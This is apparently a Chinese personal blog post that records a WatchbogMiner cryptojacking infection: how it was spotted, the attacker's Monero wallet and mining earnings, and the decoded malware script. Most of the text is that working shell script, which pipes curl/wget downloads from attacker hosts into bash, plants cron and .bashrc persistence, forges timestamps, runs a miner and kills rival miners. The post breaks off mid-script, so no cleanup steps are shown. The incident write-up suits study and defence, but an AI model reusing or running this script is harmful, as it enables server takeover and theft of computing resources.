WatchbogMiner清除记录
该篇为 被Watchbog挖矿病毒入侵,以此做下 个人记录。
前言:
该病毒2019年被发现,由于其会在/tmp/目录下释放一个叫watchdogs的母体文件而得名,传播机制为 Redis未授权访问漏洞及SSH爆破传播。WatchdogsMiner的初始版本会将恶意代码托管在pastebin.com上以绕过检测,不过后续版本已弃用,改为自己的C&C服务器*.systemten.org。该病毒的特点是样本由go语言编译,并试用了伪装的hippies/LSD包(github_com_hippies_LSD_*)。
1)且本次黑客钱包地址:
48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U
2)门罗币矿池地址:
https://minexmr.com/#worker_stats
3)已挖获门罗币:
32.5个,目前算力96.40KH/S,大概8千台左右的服务器被控制挖矿。
4)山寨币行情价格地址:
累计挖取价值:今日价格为608元/个*32.5 = 1.976W元。
一:Watchbog的发现过程
1.0.0 开始是WinSCP连接出现 “收到太大的SFTP包” 报错,如下图,登录FinalShell查看CPU进程只有1%,一开始只是觉得是FTP连接的问题。
1.0.1 解决该问题都指向 指向.ssh目录下的.bashrc文件,此时病毒尚未挖矿。将.bashrc sed -i 黄字行 清除后重新登录,FTP可登录成功。
多留心了一下,再vim .bashrc文件时,此时CPU运行只有1%,而黄字行重新被写入。这个行为极为反常,就认定以有病毒。
1.0.2 查看黄字行,根据其拉取 命令行可知,https://pastebin.com/raw/1eDKHr4r 和 https://pastebin.com/raw/UhUmR517地址。
sed -i '/pastebin.com/d' /etc/hosts;(curl -fsSLk sadan666.xyz:9080/rr -m 90||wget -q -O - sadan666.xyz:9080/rr --no-check-certificate -t 2 -T 60||curl -fsSL https://pastebin.com/raw/1eDKHr4r||wget -q -O- https://pastebin.com/raw/1eDKHr4r)|bash
对地址进行查看:
将上述在第三方pastebin.com托管代码Base64解码可得病毒shell脚本如下。
1 #!/bin/bash 2 SHELL=/bin/sh 3 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 4 house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzFlREtIcjRy|base64 -d) 5 park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2I1eDFwUnpL|base64 -d) 6 beam=$(echo c2FkYW42NjYueHl6OjkwODAvcnI=|base64 -d) 7 deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NqaldldlRz|base64 -d) 8 surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3R5am5UUVRB|base64 -d) 9 me=$( whoami ) 10 function getarch() { 11 ver="x86_64" 12 arch=$(uname -m) 13 arch2=$(uname -i) 14 arch3=$(getconf LONG_BIT) 15 if [ "$arch" == "x86_64" ]; then 16 ver="x86_64" 17 elif [ "$arch" == "i686" ]; then 18 ver="i686" 19 elif [ "$arch2" == "x86_64" ]; then 20 ver="x86_64" 21 elif [ "$arch2" == "i386" ]; then 22 ver="i686" 23 elif [ "$arch3" == "64" ]; then 24 ver="x86_64" 25 else 26 ver="x86_64" 27 fi 28 echo $ver 29 } 30 31 ARCH=$(getarch) 32 33 function system() { 34 chattr -i /etc/crontab 35 rm -rf /bin/httpntp /bin/ftpsdns 36 sed -i '/httpntp/d' /etc/crontab 37 sed -i '/ftpsdns/d' /etc/crontab 38 echo -e "(curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/httpntp 39 chmod 755 /bin/httpntp 40 if [ ! -f "/etc/crontab" ]; then 41 echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /bin/httpntp\n##" >> /etc/crontab 42 else 43 echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab 44 fi 45 echo -e "(curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/ftpsdns 46 chmod 755 /bin/ftpsdns 47 if [ ! -f "/etc/crontab" ]; then 48 echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n5 1 * * * root /bin/ftpsdns\n##" >> /etc/crontab 49 else 50 echo -e "5 1 * * * root /bin/ftpsdns" >> /etc/crontab 51 fi 52 touch -acmr /bin/sh /etc/crontab 53 } 54 55 function cronhigh() { 56 chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root 57 rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 58 mkdir -p /var/spool/cron/crontabs 59 mkdir -p /etc/cron.hourly 60 mkdir -p /etc/cron.daily 61 mkdir -p /etc/cron.monthly 62 sed -i '/pastebin.com/d' /etc/cron.d/root && sed -i '/##/d' /etc/cron.d/root 63 sed -i '/pastebin.com/d' /etc/cron.d/apache && sed -i '/##/d' /etc/cron.d/apache 64 sed -i '/pastebin.com/d' /etc/cron.d/system && sed -i '/##/d' /etc/cron.d/system 65 sed -i '/pastebin.com/d' /var/spool/cron/crontabs/root && sed -i '/##/d' /var/spool/cron/crontabs/root 66 sed -i '/pastebin.com/d' /var/spool/cron/root && sed -i '/##/d' /var/spool/cron/root 67 key=$( (curl -fsSL $house||wget -q -O - $house) ) 68 echo -e "*/3 * * * * root (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/root 69 echo -e "*/6 * * * * root (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/system 70 echo -e "*/7 * * * * root (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/apache 71 echo -e "*/9 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/root 72 echo -e "*/11 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/crontabs/root 73 if [ ! -f "/etc/cron.hourly/oanacroane" ]; then 74 echo $key > /etc/cron.hourly/oanacroane && chmod 755 /etc/cron.hourly/oanacroane 75 fi 76 if [ ! -f "/etc/cron.daily/oanacroane" ]; then 77 echo $key > /etc/cron.daily/oanacroane && chmod 755 /etc/cron.daily/oanacroane 78 fi 79 if [ ! -f "/etc/cron.monthly/oanacroane" ]; then 80 echo $key > /etc/cron.monthly/oanacroane && chmod 755 /etc/cron.monthly/oanacroane 81 fi 82 touch -acmr /bin/sh /var/spool/cron/root 83 touch -acmr /bin/sh /var/spool/cron/crontabs/root 84 touch -acmr /bin/sh /etc/cron.d/system 85 touch -acmr /bin/sh /etc/cron.d/apache 86 touch -acmr /bin/sh /etc/cron.d/root 87 touch -acmr /bin/sh /etc/cron.hourly/oanacroane 88 touch -acmr /bin/sh /etc/cron.daily/oanacroane 89 touch -acmr /bin/sh /etc/cron.monthly/oanacroane 90 } 91 92 function cronlow() { 93 cr=$(crontab -l | grep "$house" | wc -l) 94 if [ ${cr} -eq 0 ];then 95 crontab -r 96 (crontab -l 2>/dev/null; echo "*/10 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash > /dev/null 2>&1")| crontab - 97 else 98 echo " " 99 fi 100 } 101 102 function cronbackup() { 103 pay="(curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60||curl -fsSL $house||wget -q -O- $house)|bash" 104 status=0 105 crona=$(systemctl is-active cron) 106 cronb=$(systemctl is-active crond) 107 cronatd=$(systemctl is-active atd) 108 if [ "$crona" == "active" ] ; then 109 status=0 110 elif [ "$cronb" == "active" ]; then 111 status=0 112 elif [ "$cronatd" == "active" ] ; then 113 status=1 114 else 115 status=2 116 fi 117 if [ $status -eq 1 ] ; then 118 for a in $(at -l|awk '{print $1}'); do at -r $a; done 119 echo "$pay" | at -m now + 1 minute 120 fi 121 if [ $status -eq 2 ] || [ "$me" != "root" ] ;then 122 amiup=$(ps -fe|grep 'crun'|grep -v grep|wc -l) 123 if [ ${amiup} -ne 0 ] ; then 124 ps auxf|grep -v grep|grep "crun" | awk '{print $2}'|xargs kill -9 125 fi 126 key="while true; do sleep 600 && $pay; done" 127 echo -e "$key\n##" > /tmp/crun && chmod 777 /tmp/crun && cd /tmp/ 128 nohup ./crun >/dev/null 2>&1 & 129 sleep 15 130 rm /tmp/crun 131 fi 132 } 133 134 function cronrc() { 135 if [ "$me" != "root" ];then 136 cron_rc_path="/home/$me/.bashrc" 137 pay_rc="(curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60||curl -fsSL $house||wget -q -O- $house)|bash" 138 else 139 cron_rc_path="/root/.bashrc" 140 pay_rc="sed -i '/pastebin.com/d' /etc/hosts;(curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60||curl -fsSL $house||wget -q -O- $house)|bash" 141 fi 142 if [ -f "$cron_rc_path" ]; then 143 sed -i '/pastebin.com/d' $cron_rc_path 144 sed -i '/loaded_JavaUpdates_rc/d' $cron_rc_path 145 echo -e "$pay_rc\n##loaded_JavaUpdates_rc" >> $cron_rc_path 146 fi 147 } 148 149 function gettarfile() { 150 temp_path="/tmp/.tmpdropoff" 151 build_string="/tmp/.tmpdropoff/JavaUpdates" 152 if [ "$3" == "-xzf" ];then 153 tar_out="/tmp/.tmpdropoff/wwe" 154 rig_path="/tmp/.tmpdropoff/dataoutput/xmrig-notls" 155 else 156 tar_out="/tmp/.tmpdropoff/wwe" 157 rig_path="/tmp/.tmpdropoff/dataoutput/xmr-stak" 158 fi 159 mkdir -p $temp_path/dataoutput/ 160 cd $temp_path 161 (curl -fsSL $2 -o $tar_out||wget -q $2 -O $tar_out) 162 base64 -d $tar_out >$build_string 163 mv $build_string $3 164 cd $1 165 rm -rf $temp_path 166 } 167 168 function download() { 169 pa=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 170 if [ ${pa} -eq 0 ];then 171 mi_64=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0dNZGVXcWVjCg==|base64 -d) 172 der_ke=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2RYRDJCczBICg==|base64 -d) 173 if [ "$me" != "root" ]; then 174 path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data" 175 if [ -d "$path" ]; then 176 rm -rf $path/* 177 else 178 mkdir -p $path 179 fi 180 else 181 path="/bin" 182 rm -rf $path/config.json $path/JavaUpdates 183 fi 184 cd $path 185 if [ "$ARCH" == "x86_64" ]; then 186 if [ ! -f "$path/JavaUpdates" ]; then 187 gettarfile "$path" "$mi_64" "$path/JavaUpdates" 188 chmod 777 $path/JavaUpdates 189 nohup ./JavaUpdates >/dev/null 2>&1 & 190 sleep 15 191 rm -rf $path/JavaUpdates 192 else 193 nohup ./JavaUpdates >/dev/null 2>&1 & 194 sleep 15 195 rm -rf $path/JavaUpdates 196 fi 197 elif [ "$ARCH" == "i686" ]; then 198 # if [ ! -f "$path/JavaUpdates" ]; then 199 # getencodedfile "$mi_32" "$path/JavaUpdates" 200 # chmod 777 $path/JavaUpdates 201 # nohup ./JavaUpdates >/dev/null 2>&1 & 202 # else 203 # nohup ./JavaUpdates >/dev/null 2>&1 & 204 # fi 205 echo "" 206 else 207 if [ ! -f "$path/JavaUpdates" ]; then 208 gettarfile "$path" "$mi_64" "$path/JavaUpdates" 209 chmod 777 $path/JavaUpdates 210 nohup ./JavaUpdates >/dev/null 2>&1 & 211 sleep 15 212 rm -rf $path/JavaUpdates 213 else 214 nohup ./JavaUpdates >/dev/null 2>&1 & 215 sleep 15 216 rm -rf $path/JavaUpdates 217 fi 218 fi 219 fi 220 } 221 222 function testa() { 223 pb=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 224 if [ ${pb} -eq 0 ];then 225 st_64=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VzY3RmZ3J4Cg==|base64 -d) 226 con_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1prejBkOUp6Cg==|base64 -d) 227 cpu_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L212U0VHbVI2Cg==|base64 -d) 228 poo_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NCMFRZQnZHCg==|base64 -d) 229 if [ "$me" != "root" ]; then 230 path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data" 231 if [ -d "$path" ]; then 232 rm -rf $path/* 233 else 234 mkdir -p $path 235 fi 236 else 237 path="/bin" 238 rm -rf $path/config.json $path/JavaUpdates $path/config.txt $path/cpu.txt $path/pools.txt 239 fi 240 cd $path 241 if [ "$ARCH" == "x86_64" ]; then 242 if [ ! -f "$path/JavaUpdates" ]; then 243 gettarfile "$path" "$st_64" "$path/JavaUpdates" 244 chmod 777 $path/JavaUpdates 245 nohup ./JavaUpdates >/dev/null 2>&1 & 246 sleep 15 247 rm -rf $path/JavaUpdates 248 else 249 nohup ./JavaUpdates >/dev/null 2>&1 & 250 sleep 15 251 rm -rf $path/JavaUpdates 252 fi 253 else 254 rm -rf $path/cpu.txt $path/pools.txt $path/config.txt 255 fi 256 fi 257 } 258 259 function finished() { 260 (curl -fsSL $1 || wget -q -O - $1) && touch /tmp/.tmpc 261 } 262 263 264 kill_miner_proc() 265 { 266 netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 % 267 netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 % 268 netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 269 netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 270 netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 271 netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 272 netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 273 netstat -anp | grep :4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 274 netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 275 netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 276 netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 277 netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 278 netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 279 netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 280 netstat -anp | grep :14433 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % 281 ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 % 282 ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 % 283 ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 % 284 ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 % 285 ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 % 286 ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 % 287 ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 % 288 ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 % 289 ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 % 290 ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 % 291 ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 % 292 ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 % 293 ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 % 294 ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 % 295 ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 % 296 ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 % 297 ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 % 298 ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 % 299 ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 % 300 ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 % 301 ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 % 302 ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 % 303 ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 % 304 ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 % 305 ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 % 306 ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 % 307 ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 % 308 ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 % 309 ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 % 310 ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 % 311 ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 % 312 ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 % 313 ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 % 314 ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 % 315 ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 % 316 ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 % 317 ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 % 318 ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 % 319 ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 % 320 ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 % 321 ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 % 322 ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 % 323 ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 % 324 ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 % 325 ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 % 326 ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 % 327 ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 % 328 ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 % 329 ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 % 330 ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 % 331 ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 % 332 ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 % 333 ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 % 334 ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 % 335 ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 % 336 ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 % 337 ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 % 338 ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 % 339 ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 % 340 ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 % 341 ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 % 342 ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 % 343 ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 % 344 ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 % 345 ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 % 346 ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 % 347 ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 % 348 ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 % 349 ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 % 350 ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 % 351 ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 % 352 ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 % 353 ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 % 354 ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 % 355 ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 % 356 ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 % 357 ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 % 358 ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 % 359 ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 % 360 ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 % 361 ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 % 362 ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 % 363 ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 % 364 ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 % 365 ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 % 366 ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 % 367 ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 % 368 ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 % 369 ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 % 370 ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % 371 ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % 372 ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % 373 ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % 374 ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % 375 ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % 376 ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % 377 ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % 378 ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 % 379 ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % 380 ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % 381 ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % 382 ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % 383 ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % 384 ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % 385 ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % 386 ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % 387 ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % 388 ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % 389 ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 % 390 ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 % 391 ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 % 392 ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 % 393 ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 % 394 ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 % 395 ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 % 396 ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 % 397 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 % 398 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 % 399 ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 % 400 ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 % 401 ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 % 402 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 % 403 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 % 404 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 % 405 ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 % 406 ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 % 407 ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 % 408 ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 % 409 ps auxf | grep xiaoxue | awk '{print $2}' | 